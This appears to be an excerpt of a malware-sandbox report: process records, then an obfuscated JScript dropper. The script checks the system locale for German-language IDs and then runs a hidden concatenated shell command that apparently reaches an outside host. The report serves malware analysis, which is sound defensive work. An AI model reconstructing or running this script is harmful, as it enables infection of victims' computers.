MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 21:23:18 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 21:23:19 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function ksexwclmc() { |
|
1 | zmucllzy = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var zsoaz = this[fkfypc + twmtllwm + xqjxluo + orsywqoqs + wbzgdukp + szwbyodp + fcltjwf + kxwxixzl] ( this[nxnnw + hinshjjh + rolfii + xqjxluo + ufxhzyv + fkfypc + kxwxixzl][eieyqc + xqjxluo + wbzgdukp + twmtllwm + kxwxixzl + wbzgdukp + qrllq + zostnuf + cucrgbiy + wbzgdukp + rolfii + kxwxixzl] ( nxnnw + hinshjjh + rolfii + xqjxluo + ufxhzyv + fkfypc + kxwxixzl + kgycio + hinshjjh + lqvmupgq + wbzgdukp + wgaflu + wgaflu ) [tlwae + wbzgdukp + qsssmoo + tlwae + wbzgdukp + twmtllwm + jucqi] ( jaltw + ewcuonofo + wwopynr + tsybmnvsq + kdvaey + eieyqc + phirya + tlwae + tlwae + wwopynr + xqmlff + dgulpegn + kdvaey + phirya + hinshjjh + wwopynr + tlwae + avzdibkf + eieyqc + heuxk + fcltjwf + kxwxixzl + xqjxluo + heuxk + wgaflu + xxlfb + pfqlj + twmtllwm + fcltjwf + wbzgdukp + wgaflu + avzdibkf + szwbyodp + fcltjwf + kxwxixzl + wbzgdukp + xqjxluo + fcltjwf + twmtllwm + kxwxixzl + ufxhzyv + heuxk + fcltjwf + twmtllwm + wgaflu + avzdibkf + fskogd + heuxk + rolfii + twmtllwm + wgaflu + wbzgdukp ), 16 ); |
|
3 | for ( hbvlfqpk = 0 ; hbvlfqpk < zmucllzy[wgaflu + wbzgdukp + fcltjwf + qsssmoo + kxwxixzl + lqvmupgq] ; ++ hbvlfqpk ) | |
4 | { | |
5 | if ( zsoaz == zmucllzy[hbvlfqpk] ) | |
6 | { | |
7 | zsoaz = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( zsoaz !== true ) | |
12 | this[nxnnw + hinshjjh + rolfii + xqjxluo + ufxhzyv + fkfypc + kxwxixzl][hfuhae + nxifgfk + ufxhzyv + kxwxixzl] ( ); | |
13 | this[nxnnw + hinshjjh + rolfii + xqjxluo + ufxhzyv + fkfypc + kxwxixzl][eieyqc + xqjxluo + wbzgdukp + twmtllwm + kxwxixzl + wbzgdukp + qrllq + zostnuf + cucrgbiy + wbzgdukp + rolfii + kxwxixzl] ( nxnnw + hinshjjh + rolfii + xqjxluo + ufxhzyv + fkfypc + kxwxixzl + kgycio + hinshjjh + lqvmupgq + wbzgdukp + wgaflu + wgaflu ) [xqjxluo + nxifgfk + fcltjwf] ( rolfii + ziftruxmt + jucqi + xxlfb + wpsbia + rolfii + xxlfb + fkfypc + heuxk + htwruw + wbzgdukp + xqjxluo + orsywqoqs + lqvmupgq + wbzgdukp + wgaflu + wgaflu + kgycio + wbzgdukp + lpyjvw + wbzgdukp + xxlfb + cwpmkkwl + eieyqc + heuxk + ziftruxmt + ziftruxmt + twmtllwm + fcltjwf + jucqi + xxlfb + aitoocsv + szwbyodp + fcltjwf + ikxpvvbf + heuxk + qialjj + wbzgdukp + cwpmkkwl + nxnnw + wbzgdukp + zostnuf + tlwae + wbzgdukp + iiiet + nxifgfk + wbzgdukp + orsywqoqs + kxwxixzl + xxlfb + cwpmkkwl + qrllq + nxifgfk + kxwxixzl + jvscv + ufxhzyv + wgaflu + wbzgdukp + xxlfb + bcpudoy + kxwxixzl + wbzgdukp + ziftruxmt + fkfypc + bcpudoy + avzdibkf + ufxhzyv + fcltjwf + ikxpvvbf + heuxk + ufxhzyv + rolfii + wbzgdukp + kgycio + fkfypc + jucqi + prygvhmc + xxlfb + lqvmupgq + kxwxixzl + kxwxixzl + fkfypc + ywyzkqwwr + wpsbia + wpsbia + spgviipxp + bkmosknb + hbkhrpfkl + kgycio + spgviipxp + kmjlkzwkr + hbkhrpfkl + kgycio + spgviipxp + kgycio + wwhbwy + fohjv + qwljex + wpsbia + ufxhzyv + fcltjwf + ikxpvvbf + heuxk + ufxhzyv + rolfii + wbzgdukp + kgycio + fkfypc + lqvmupgq + fkfypc + aitoocsv + snxzutl + snxzutl + orsywqoqs + kxwxixzl + twmtllwm + xqjxluo + kxwxixzl + xxlfb + bcpudoy + kxwxixzl + wbzgdukp + ziftruxmt + fkfypc + bcpudoy + avzdibkf + ufxhzyv + fcltjwf + ikxpvvbf + heuxk + ufxhzyv + rolfii + wbzgdukp + kgycio + fkfypc + jucqi + prygvhmc + snxzutl + snxzutl + rolfii + ziftruxmt + jucqi + xxlfb + wpsbia + rolfii + xxlfb + fcltjwf + wbzgdukp + kxwxixzl + xxlfb + nxifgfk + orsywqoqs + wbzgdukp + xxlfb + avzdibkf + avzdibkf + spgviipxp + bkmosknb + hbkhrpfkl + kgycio + spgviipxp + kmjlkzwkr + hbkhrpfkl + kgycio + spgviipxp + kgycio + wwhbwy + fohjv + qwljex + dletfrcf + gbeqnw + gbeqnw + gbeqnw + gbeqnw + avzdibkf + jucqi + twmtllwm + ikxpvvbf + htwruw + htwruw + htwruw + xqjxluo + heuxk + heuxk + kxwxixzl + avzdibkf + snxzutl + snxzutl + rolfii + ziftruxmt + jucqi + xxlfb + wpsbia + rolfii + xxlfb + xqjxluo + wbzgdukp + qsssmoo + orsywqoqs + ikxpvvbf + xqjxluo + hbkhrpfkl + wwhbwy + xxlfb + wpsbia + orsywqoqs + xxlfb + avzdibkf + avzdibkf + spgviipxp + bkmosknb + hbkhrpfkl + kgycio + spgviipxp + kmjlkzwkr + hbkhrpfkl + kgycio + spgviipxp + kgycio + wwhbwy + fohjv + qwljex + dletfrcf + gbeqnw + gbeqnw + gbeqnw + gbeqnw + avzdibkf + jucqi + twmtllwm + ikxpvvbf + htwruw + htwruw + htwruw + xqjxluo + heuxk + heuxk + kxwxixzl + avzdibkf + hbkhrpfkl + spgviipxp + spgviipxp + hbkhrpfkl + gkjqbpg + wwhbwy + wwhbwy + kmjlkzwkr + hbkhrpfkl + fohjv + spgviipxp + bkmosknb + gkjqbpg + hbkhrpfkl + gbeqnw + kgycio + jucqi + wgaflu + wgaflu, 0, false ); |
|
14 | } | |
15 | qialjj = "V"; | |
16 | qialjj = "l"; | |
17 | qialjj = "O"; | |
18 | qialjj = "d"; | |
19 | qialjj = "b"; | |
20 | qialjj = "R"; | |
21 | qialjj = "Y"; | |
22 | qialjj = "N"; | |
23 | qialjj = "U"; | |
24 | qialjj = "B"; | |
25 | qialjj = "L"; | |
26 | qialjj = "I"; | |
27 | qialjj = "C"; | |
28 | qialjj = "h"; | |
29 | qialjj = "M"; | |
30 | qialjj = "J"; | |
31 | qialjj = "W"; | |
32 | qialjj = "p"; | |
33 | qialjj = "x"; | |
34 | qialjj = "H"; | |
35 | qialjj = "J"; | |
36 | qialjj = "H"; | |
37 | qialjj = "P"; | |
38 | qialjj = "l"; | |
39 | qialjj = "i"; | |
40 | qialjj = "Y"; | |
41 | qialjj = "F"; | |
42 | qialjj = "o"; | |
43 | qialjj = "S"; | |
44 | qialjj = "p"; | |
45 | qialjj = "a"; | |
46 | qialjj = "R"; | |
47 | qialjj = "t"; | |
48 | qialjj = "S"; | |
49 | qialjj = "V"; | |
50 | qialjj = "S"; | |
51 | qialjj = "i"; | |
52 | qialjj = "q"; | |
53 | qialjj = "L"; | |
54 | qialjj = "k"; | |
55 | gbeqnw = "q"; | |
56 | gbeqnw = "g"; | |
57 | gbeqnw = "8"; | |
58 | qwljex = "y"; | |
59 | qwljex = "g"; | |
60 | qwljex = "b"; | |
61 | qwljex = "x"; | |
62 | qwljex = "5"; | |
63 | fcltjwf = "N"; | |
64 | fcltjwf = "B"; | |
65 | fcltjwf = "r"; | |
66 | fcltjwf = "e"; | |
67 | fcltjwf = "e"; | |
68 | fcltjwf = "B"; | |
69 | fcltjwf = "l"; | |
70 | fcltjwf = "Y"; | |
71 | fcltjwf = "d"; | |
72 | fcltjwf = "n"; | |
73 | wwhbwy = "U"; | |
74 | wwhbwy = "U"; | |
75 | wwhbwy = "o"; | |
76 | wwhbwy = "c"; | |
77 | wwhbwy = "l"; | |
78 | wwhbwy = "O"; | |
79 | wwhbwy = "i"; | |
80 | wwhbwy = "A"; | |
81 | wwhbwy = "e"; | |
82 | wwhbwy = "I"; | |
83 | wwhbwy = "r"; | |
84 | wwhbwy = "Z"; | |
85 | wwhbwy = "F"; | |
86 | wwhbwy = "C"; | |
87 | wwhbwy = "n"; | |
88 | wwhbwy = "X"; | |
89 | wwhbwy = "o"; | |
90 | wwhbwy = "L"; | |
91 | wwhbwy = "R"; | |
92 | wwhbwy = "h"; | |
93 | wwhbwy = "d"; | |
94 | wwhbwy = "X"; | |
95 | wwhbwy = "T"; | |
96 | wwhbwy = "E"; | |
97 | wwhbwy = "2"; | |
98 | iiiet = "W"; | |
99 | iiiet = "q"; | |
100 | htwruw = "l"; | |
101 | htwruw = "T"; | |
102 | htwruw = "B"; | |
103 | htwruw = "O"; | |
104 | htwruw = "w"; | |
105 | qrllq = "r"; | |
106 | qrllq = "M"; | |
107 | qrllq = "y"; | |
108 | qrllq = "F"; | |
109 | qrllq = "H"; | |
110 | qrllq = "p"; | |
111 | qrllq = "E"; | |
112 | qrllq = "I"; | |
113 | qrllq = "q"; | |
114 | qrllq = "m"; | |
115 | qrllq = "f"; | |
116 | qrllq = "A"; | |
117 | qrllq = "G"; | |
118 | qrllq = "y"; | |
119 | qrllq = "V"; | |
120 | qrllq = "b"; | |
121 | qrllq = "S"; | |
122 | qrllq = "f"; | |
123 | qrllq = "h"; | |
124 | qrllq = "L"; | |
125 | qrllq = "U"; | |
126 | qrllq = "f"; | |
127 | qrllq = "E"; | |
128 | qrllq = "c"; | |
129 | qrllq = "B"; | |
130 | qrllq = "O"; | |
131 | aitoocsv = "W"; | |
132 | aitoocsv = "l"; | |
133 | aitoocsv = "j"; | |
134 | aitoocsv = "s"; | |
135 | aitoocsv = "B"; | |
136 | aitoocsv = "q"; | |
137 | aitoocsv = "j"; | |
138 | aitoocsv = "H"; | |
139 | aitoocsv = "k"; | |
140 | aitoocsv = "T"; | |
141 | aitoocsv = "v"; | |
142 | aitoocsv = "F"; | |
143 | aitoocsv = "\""; | |
144 | xqmlff = "A"; | |
145 | xqmlff = "m"; | |
146 | xqmlff = "o"; | |
147 | xqmlff = "T"; | |
148 | xqmlff = "V"; | |
149 | xqmlff = "w"; | |
150 | xqmlff = "L"; | |
151 | xqmlff = "N"; | |
152 | xqmlff = "h"; | |
153 | xqmlff = "R"; | |
154 | xqmlff = "M"; | |
155 | xqmlff = "T"; | |
156 | xqmlff = "X"; | |
157 | xqmlff = "j"; | |
158 | xqmlff = "D"; | |
159 | xqmlff = "I"; | |
160 | xqmlff = "L"; | |
161 | xqmlff = "g"; | |
162 | xqmlff = "q"; | |
163 | xqmlff = "q"; | |
164 | xqmlff = "N"; | |
165 | jvscv = "u"; | |
166 | jvscv = "E"; | |
167 | jvscv = "X"; | |
168 | jvscv = "Q"; | |
169 | jvscv = "B"; | |
170 | jvscv = "j"; | |
171 | jvscv = "D"; | |
172 | jvscv = "i"; | |
173 | jvscv = "T"; | |
174 | jvscv = "H"; | |
175 | jvscv = "I"; | |
176 | jvscv = "B"; | |
177 | jvscv = "K"; | |
178 | jvscv = "l"; | |
179 | jvscv = "T"; | |
180 | jvscv = "f"; | |
181 | jvscv = "j"; | |
182 | jvscv = "x"; | |
183 | jvscv = "h"; | |
184 | jvscv = "T"; | |
185 | jvscv = "k"; | |
186 | jvscv = "N"; | |
187 | jvscv = "F"; | |
188 | prygvhmc = "K"; | |
189 | prygvhmc = "L"; | |
190 | prygvhmc = "G"; | |
191 | prygvhmc = "R"; | |
192 | prygvhmc = "Z"; | |
193 | prygvhmc = "S"; | |
194 | prygvhmc = "T"; | |
195 | prygvhmc = "Y"; | |
196 | prygvhmc = "d"; | |
197 | prygvhmc = "L"; | |
198 | prygvhmc = "z"; | |
199 | prygvhmc = "N"; | |
200 | prygvhmc = "Q"; | |
201 | prygvhmc = "d"; | |
202 | prygvhmc = "l"; | |
203 | prygvhmc = "P"; | |
204 | prygvhmc = "H"; | |
205 | prygvhmc = "f"; | |
206 | twmtllwm = "D"; | |
207 | twmtllwm = "n"; | |
208 | twmtllwm = "F"; | |
209 | twmtllwm = "J"; | |
210 | twmtllwm = "T"; | |
211 | twmtllwm = "A"; | |
212 | twmtllwm = "Z"; | |
213 | twmtllwm = "Y"; | |
214 | twmtllwm = "e"; | |
215 | twmtllwm = "K"; | |
216 | twmtllwm = "Q"; | |
217 | twmtllwm = "D"; | |
218 | twmtllwm = "B"; | |
219 | twmtllwm = "V"; | |
220 | twmtllwm = "B"; | |
221 | twmtllwm = "C"; | |
222 | twmtllwm = "w"; | |
223 | twmtllwm = "O"; | |
224 | twmtllwm = "o"; | |
225 | twmtllwm = "W"; | |
226 | twmtllwm = "C"; | |
227 | twmtllwm = "s"; | |
228 | twmtllwm = "g"; | |
229 | twmtllwm = "s"; | |
230 | twmtllwm = "g"; | |
231 | twmtllwm = "K"; | |
232 | twmtllwm = "r"; | |
233 | twmtllwm = "X"; | |
234 | twmtllwm = "P"; | |
235 | twmtllwm = "Y"; | |
236 | twmtllwm = "y"; | |
237 | twmtllwm = "R"; | |
238 | twmtllwm = "a"; | |
239 | zostnuf = "j"; | |
240 | zostnuf = "e"; | |
241 | zostnuf = "e"; | |
242 | zostnuf = "B"; | |
243 | zostnuf = "S"; | |
244 | zostnuf = "P"; | |
245 | zostnuf = "c"; | |
246 | zostnuf = "d"; | |
247 | zostnuf = "w"; | |
248 | zostnuf = "v"; | |
249 | zostnuf = "n"; | |
250 | zostnuf = "n"; | |
251 | zostnuf = "a"; | |
252 | zostnuf = "x"; | |
253 | zostnuf = "S"; | |
254 | zostnuf = "C"; | |
255 | zostnuf = "v"; | |
256 | zostnuf = "z"; | |
257 | zostnuf = "L"; | |
258 | zostnuf = "b"; | |
259 | zostnuf = "V"; | |
260 | zostnuf = "q"; | |
261 | zostnuf = "w"; | |
262 | zostnuf = "a"; | |
263 | zostnuf = "b"; | |
264 | kgycio = "N"; | |
265 | kgycio = "e"; | |
266 | kgycio = "A"; | |
267 | kgycio = "R"; | |
268 | kgycio = "j"; | |
269 | kgycio = "H"; | |
270 | kgycio = "b"; | |
271 | kgycio = "B"; | |
272 | kgycio = "q"; | |
273 | kgycio = "e"; | |
274 | kgycio = "x"; | |
275 | kgycio = "Z"; | |
276 | kgycio = "W"; | |
277 | kgycio = "."; | |
278 | fohjv = "Z"; | |
279 | fohjv = "R"; | |
280 | fohjv = "Z"; | |
281 | fohjv = "G"; | |
282 | fohjv = "F"; | |
283 | fohjv = "L"; | |
284 | fohjv = "u"; | |
285 | fohjv = "e"; | |
286 | fohjv = "w"; | |
287 | fohjv = "j"; | |
288 | fohjv = "P"; | |
289 | fohjv = "H"; | |
290 | fohjv = "Y"; | |
291 | fohjv = "a"; | |
292 | fohjv = "X"; | |
293 | fohjv = "I"; | |
294 | fohjv = "n"; | |
295 | fohjv = "C"; | |
296 | fohjv = "M"; | |
297 | fohjv = "f"; | |
298 | fohjv = "k"; | |
299 | fohjv = "c"; | |
300 | fohjv = "O"; | |
301 | fohjv = "M"; | |
302 | fohjv = "0"; | |
303 | kmjlkzwkr = "a"; | |
304 | kmjlkzwkr = "o"; | |
305 | kmjlkzwkr = "M"; | |
306 | kmjlkzwkr = "A"; | |
307 | kmjlkzwkr = "D"; | |
308 | kmjlkzwkr = "f"; | |
309 | kmjlkzwkr = "R"; | |
310 | kmjlkzwkr = "A"; | |
311 | kmjlkzwkr = "x"; | |
312 | kmjlkzwkr = "n"; | |
313 | kmjlkzwkr = "b"; | |
314 | kmjlkzwkr = "U"; | |
315 | kmjlkzwkr = "S"; | |
316 | kmjlkzwkr = "S"; | |
317 | kmjlkzwkr = "X"; | |
318 | kmjlkzwkr = "k"; | |
319 | kmjlkzwkr = "Z"; | |
320 | kmjlkzwkr = "B"; | |
321 | kmjlkzwkr = "a"; | |
322 | kmjlkzwkr = "i"; | |
323 | kmjlkzwkr = "X"; | |
324 | kmjlkzwkr = "j"; | |
325 | kmjlkzwkr = "h"; | |
326 | kmjlkzwkr = "R"; | |
327 | kmjlkzwkr = "K"; | |
328 | kmjlkzwkr = "v"; | |
329 | kmjlkzwkr = "d"; | |
330 | kmjlkzwkr = "g"; | |
331 | kmjlkzwkr = "s"; | |
332 | kmjlkzwkr = "Q"; | |
333 | kmjlkzwkr = "b"; | |
334 | kmjlkzwkr = "J"; | |
335 | kmjlkzwkr = "V"; | |
336 | kmjlkzwkr = "H"; | |
337 | kmjlkzwkr = "n"; | |
338 | kmjlkzwkr = "S"; | |
339 | kmjlkzwkr = "m"; | |
340 | kmjlkzwkr = "j"; | |
341 | kmjlkzwkr = "c"; | |
342 | kmjlkzwkr = "R"; | |
343 | kmjlkzwkr = "i"; | |
344 | kmjlkzwkr = "4"; | |
345 | cucrgbiy = "Y"; | |
346 | cucrgbiy = "x"; | |
347 | cucrgbiy = "V"; | |
348 | cucrgbiy = "B"; | |
349 | cucrgbiy = "q"; | |
350 | cucrgbiy = "j"; | |
351 | cucrgbiy = "W"; | |
352 | cucrgbiy = "Q"; | |
353 | cucrgbiy = "d"; | |
354 | cucrgbiy = "G"; | |
355 | cucrgbiy = "c"; | |
356 | cucrgbiy = "x"; | |
357 | cucrgbiy = "o"; | |
358 | cucrgbiy = "Z"; | |
359 | cucrgbiy = "j"; | |
360 | qsssmoo = "O"; | |
361 | qsssmoo = "z"; | |
362 | qsssmoo = "k"; | |
363 | qsssmoo = "e"; | |
364 | qsssmoo = "L"; | |
365 | qsssmoo = "v"; | |
366 | qsssmoo = "v"; | |
367 | qsssmoo = "c"; | |
368 | qsssmoo = "y"; | |
369 | qsssmoo = "R"; | |
370 | qsssmoo = "S"; | |
371 | qsssmoo = "e"; | |
372 | qsssmoo = "f"; | |
373 | qsssmoo = "J"; | |
374 | qsssmoo = "d"; | |
375 | qsssmoo = "T"; | |
376 | qsssmoo = "T"; | |
377 | qsssmoo = "L"; | |
378 | qsssmoo = "N"; | |
379 | qsssmoo = "p"; | |
380 | qsssmoo = "t"; | |
381 | qsssmoo = "J"; | |
382 | qsssmoo = "q"; | |
383 | qsssmoo = "t"; | |
384 | qsssmoo = "L"; | |
385 | qsssmoo = "s"; | |
386 | qsssmoo = "p"; | |
387 | qsssmoo = "g"; | |
388 | ufxhzyv = "x"; | |
389 | ufxhzyv = "q"; | |
390 | ufxhzyv = "I"; | |
391 | ufxhzyv = "p"; | |
392 | ufxhzyv = "Z"; | |
393 | ufxhzyv = "v"; | |
394 | ufxhzyv = "N"; | |
395 | ufxhzyv = "I"; | |
396 | ufxhzyv = "A"; | |
397 | ufxhzyv = "f"; | |
398 | ufxhzyv = "m"; | |
399 | ufxhzyv = "b"; | |
400 | ufxhzyv = "s"; | |
401 | ufxhzyv = "W"; | |
402 | ufxhzyv = "B"; | |
403 | ufxhzyv = "Y"; | |
404 | ufxhzyv = "U"; | |
405 | ufxhzyv = "D"; | |
406 | ufxhzyv = "x"; | |
407 | ufxhzyv = "O"; | |
408 | ufxhzyv = "p"; | |
409 | ufxhzyv = "v"; | |
410 | ufxhzyv = "h"; | |
411 | ufxhzyv = "E"; | |
412 | ufxhzyv = "T"; | |
413 | ufxhzyv = "t"; | |
414 | ufxhzyv = "u"; | |
415 | ufxhzyv = "e"; | |
416 | ufxhzyv = "d"; | |
417 | ufxhzyv = "l"; | |
418 | ufxhzyv = "S"; | |
419 | ufxhzyv = "r"; | |
420 | ufxhzyv = "X"; | |
421 | ufxhzyv = "w"; | |
422 | ufxhzyv = "i"; | |
423 | ufxhzyv = "i"; | |
424 | ufxhzyv = "Z"; | |
425 | ufxhzyv = "i"; | |
426 | ufxhzyv = "e"; | |
427 | ufxhzyv = "x"; | |
428 | ufxhzyv = "h"; | |
429 | ufxhzyv = "i"; | |
430 | ufxhzyv = "u"; | |
431 | ufxhzyv = "i"; | |
432 | jaltw = "r"; | |
433 | jaltw = "A"; | |
434 | jaltw = "J"; | |
435 | jaltw = "u"; | |
436 | jaltw = "L"; | |
437 | jaltw = "S"; | |
438 | jaltw = "I"; | |
439 | jaltw = "x"; | |
440 | jaltw = "s"; | |
441 | jaltw = "n"; | |
442 | jaltw = "m"; | |
443 | jaltw = "T"; | |
444 | jaltw = "y"; | |
445 | jaltw = "t"; | |
446 | jaltw = "e"; | |
447 | jaltw = "t"; | |
448 | jaltw = "I"; | |
449 | jaltw = "b"; | |
450 | jaltw = "y"; | |
451 | jaltw = "I"; | |
452 | jaltw = "w"; | |
453 | jaltw = "B"; | |
454 | jaltw = "h"; | |
455 | jaltw = "o"; | |
456 | jaltw = "b"; | |
457 | jaltw = "r"; | |
458 | jaltw = "T"; | |
459 | jaltw = "u"; | |
460 | jaltw = "g"; | |
461 | jaltw = "P"; | |
462 | jaltw = "E"; | |
463 | jaltw = "G"; | |
464 | jaltw = "X"; | |
465 | jaltw = "s"; | |
466 | jaltw = "d"; | |
467 | jaltw = "C"; | |
468 | jaltw = "Z"; | |
469 | jaltw = "w"; | |
470 | jaltw = "q"; | |
471 | jaltw = "i"; | |
472 | jaltw = "i"; | |
473 | jaltw = "W"; | |
474 | jaltw = "H"; | |
475 | ziftruxmt = "w"; | |
476 | ziftruxmt = "M"; | |
477 | ziftruxmt = "C"; | |
478 | ziftruxmt = "O"; | |
479 | ziftruxmt = "Y"; | |
480 | ziftruxmt = "W"; | |
481 | ziftruxmt = "x"; | |
482 | ziftruxmt = "E"; | |
483 | ziftruxmt = "r"; | |
484 | ziftruxmt = "W"; | |
485 | ziftruxmt = "g"; | |
486 | ziftruxmt = "x"; | |
487 | ziftruxmt = "S"; | |
488 | ziftruxmt = "h"; | |
489 | ziftruxmt = "D"; | |
490 | ziftruxmt = "x"; | |
491 | ziftruxmt = "a"; | |
492 | ziftruxmt = "e"; | |
493 | ziftruxmt = "Q"; | |
494 | ziftruxmt = "U"; | |
495 | ziftruxmt = "h"; | |
496 | ziftruxmt = "a"; | |
497 | ziftruxmt = "m"; | |
498 | nxifgfk = "G"; | |
499 | nxifgfk = "u"; | |
500 | nxifgfk = "i"; | |
501 | nxifgfk = "A"; | |
502 | nxifgfk = "o"; | |
503 | nxifgfk = "z"; | |
504 | nxifgfk = "u"; | |
505 | nxifgfk = "f"; | |
506 | nxifgfk = "s"; | |
507 | nxifgfk = "X"; | |
508 | nxifgfk = "F"; | |
509 | nxifgfk = "I"; | |
510 | nxifgfk = "A"; | |
511 | nxifgfk = "a"; | |
512 | nxifgfk = "Z"; | |
513 | nxifgfk = "j"; | |
514 | nxifgfk = "k"; | |
515 | nxifgfk = "h"; | |
516 | nxifgfk = "Z"; | |
517 | nxifgfk = "q"; | |
518 | nxifgfk = "e"; | |
519 | nxifgfk = "i"; | |
520 | nxifgfk = "X"; | |
521 | nxifgfk = "T"; | |
522 | nxifgfk = "W"; | |
523 | nxifgfk = "M"; | |
524 | nxifgfk = "W"; | |
525 | nxifgfk = "z"; | |
526 | nxifgfk = "W"; | |
527 | nxifgfk = "p"; | |
528 | nxifgfk = "V"; | |
529 | nxifgfk = "a"; | |
530 | nxifgfk = "u"; | |
531 | nxifgfk = "q"; | |
532 | nxifgfk = "G"; | |
533 | nxifgfk = "L"; | |
534 | nxifgfk = "g"; | |
535 | nxifgfk = "U"; | |
536 | nxifgfk = "S"; | |
537 | nxifgfk = "O"; | |
538 | nxifgfk = "Y"; | |
539 | nxifgfk = "u"; | |
540 | dletfrcf = "v"; | |
541 | dletfrcf = "w"; | |
542 | dletfrcf = "v"; | |
543 | dletfrcf = "s"; | |
544 | dletfrcf = "W"; | |
545 | dletfrcf = "P"; | |
546 | dletfrcf = "W"; | |
547 | dletfrcf = "t"; | |
548 | dletfrcf = "Q"; | |
549 | dletfrcf = "Z"; | |
550 | dletfrcf = "s"; | |
551 | dletfrcf = "O"; | |
552 | dletfrcf = "T"; | |
553 | dletfrcf = "z"; | |
554 | dletfrcf = "Y"; | |
555 | dletfrcf = "W"; | |
556 | dletfrcf = "n"; | |
557 | dletfrcf = "E"; | |
558 | dletfrcf = "v"; | |
559 | dletfrcf = "p"; | |
560 | dletfrcf = "s"; | |
561 | dletfrcf = "I"; | |
562 | dletfrcf = "X"; | |
563 | dletfrcf = "M"; | |
564 | dletfrcf = "e"; | |
565 | dletfrcf = "P"; | |
566 | dletfrcf = "E"; | |
567 | dletfrcf = "V"; | |
568 | dletfrcf = "K"; | |
569 | dletfrcf = "v"; | |
570 | dletfrcf = "@"; | |
571 | lpyjvw = "m"; | |
572 | lpyjvw = "f"; | |
573 | lpyjvw = "d"; | |
574 | lpyjvw = "L"; | |
575 | lpyjvw = "d"; | |
576 | lpyjvw = "f"; | |
577 | lpyjvw = "x"; | |
578 | pfqlj = "v"; | |
579 | pfqlj = "S"; | |
580 | pfqlj = "V"; | |
581 | pfqlj = "t"; | |
582 | pfqlj = "U"; | |
583 | pfqlj = "j"; | |
584 | pfqlj = "W"; | |
585 | pfqlj = "p"; | |
586 | pfqlj = "t"; | |
587 | pfqlj = "L"; | |
588 | pfqlj = "P"; | |
589 | phirya = "U"; | |
590 | szwbyodp = "t"; | |
591 | szwbyodp = "T"; | |
592 | szwbyodp = "U"; | |
593 | szwbyodp = "A"; | |
594 | szwbyodp = "Z"; | |
595 | szwbyodp = "E"; | |
596 | szwbyodp = "v"; | |
597 | szwbyodp = "h"; | |
598 | szwbyodp = "M"; | |
599 | szwbyodp = "h"; | |
600 | szwbyodp = "r"; | |
601 | szwbyodp = "j"; | |
602 | szwbyodp = "m"; | |
603 | szwbyodp = "y"; | |
604 | szwbyodp = "k"; | |
605 | szwbyodp = "u"; | |
606 | szwbyodp = "S"; | |
607 | szwbyodp = "o"; | |
608 | szwbyodp = "n"; | |
609 | szwbyodp = "s"; | |
610 | szwbyodp = "L"; | |
611 | szwbyodp = "E"; | |
612 | szwbyodp = "U"; | |
613 | szwbyodp = "e"; | |
614 | szwbyodp = "Y"; | |
615 | szwbyodp = "N"; | |
616 | szwbyodp = "q"; | |
617 | szwbyodp = "F"; | |
618 | szwbyodp = "n"; | |
619 | szwbyodp = "d"; | |
620 | szwbyodp = "w"; | |
621 | szwbyodp = "u"; | |
622 | szwbyodp = "z"; | |
623 | szwbyodp = "K"; | |
624 | szwbyodp = "R"; | |
625 | szwbyodp = "p"; | |
626 | szwbyodp = "e"; | |
627 | szwbyodp = "D"; | |
628 | szwbyodp = "J"; | |
629 | szwbyodp = "p"; | |
630 | szwbyodp = "I"; | |
631 | orsywqoqs = "q"; | |
632 | orsywqoqs = "h"; | |
633 | orsywqoqs = "L"; | |
634 | orsywqoqs = "Y"; | |
635 | orsywqoqs = "S"; | |
636 | orsywqoqs = "J"; | |
637 | orsywqoqs = "Z"; | |
638 | orsywqoqs = "Y"; | |
639 | orsywqoqs = "R"; | |
640 | orsywqoqs = "e"; | |
641 | orsywqoqs = "A"; | |
642 | orsywqoqs = "c"; | |
643 | orsywqoqs = "J"; | |
644 | orsywqoqs = "C"; | |
645 | orsywqoqs = "Z"; | |
646 | orsywqoqs = "U"; | |
647 | orsywqoqs = "d"; | |
648 | orsywqoqs = "U"; | |
649 | orsywqoqs = "C"; | |
650 | orsywqoqs = "i"; | |
651 | orsywqoqs = "F"; | |
652 | orsywqoqs = "k"; | |
653 | orsywqoqs = "M"; | |
654 | orsywqoqs = "A"; | |
655 | orsywqoqs = "R"; | |
656 | orsywqoqs = "g"; | |
657 | orsywqoqs = "a"; | |
658 | orsywqoqs = "a"; | |
659 | orsywqoqs = "e"; | |
660 | orsywqoqs = "N"; | |
661 | orsywqoqs = "h"; | |
662 | orsywqoqs = "c"; | |
663 | orsywqoqs = "b"; | |
664 | orsywqoqs = "X"; | |
665 | orsywqoqs = "q"; | |
666 | orsywqoqs = "h"; | |
667 | orsywqoqs = "c"; | |
668 | orsywqoqs = "o"; | |
669 | orsywqoqs = "E"; | |
670 | orsywqoqs = "n"; | |
671 | orsywqoqs = "s"; | |
672 | wpsbia = "m"; | |
673 | wpsbia = "H"; | |
674 | wpsbia = "W"; | |
675 | wpsbia = "Y"; | |
676 | wpsbia = "V"; | |
677 | wpsbia = "w"; | |
678 | wpsbia = "d"; | |
679 | wpsbia = "x"; | |
680 | wpsbia = "s"; | |
681 | wpsbia = "r"; | |
682 | wpsbia = "H"; | |
683 | wpsbia = "c"; | |
684 | wpsbia = "l"; | |
685 | wpsbia = "H"; | |
686 | wpsbia = "L"; | |
687 | wpsbia = "h"; | |
688 | wpsbia = "n"; | |
689 | wpsbia = "m"; | |
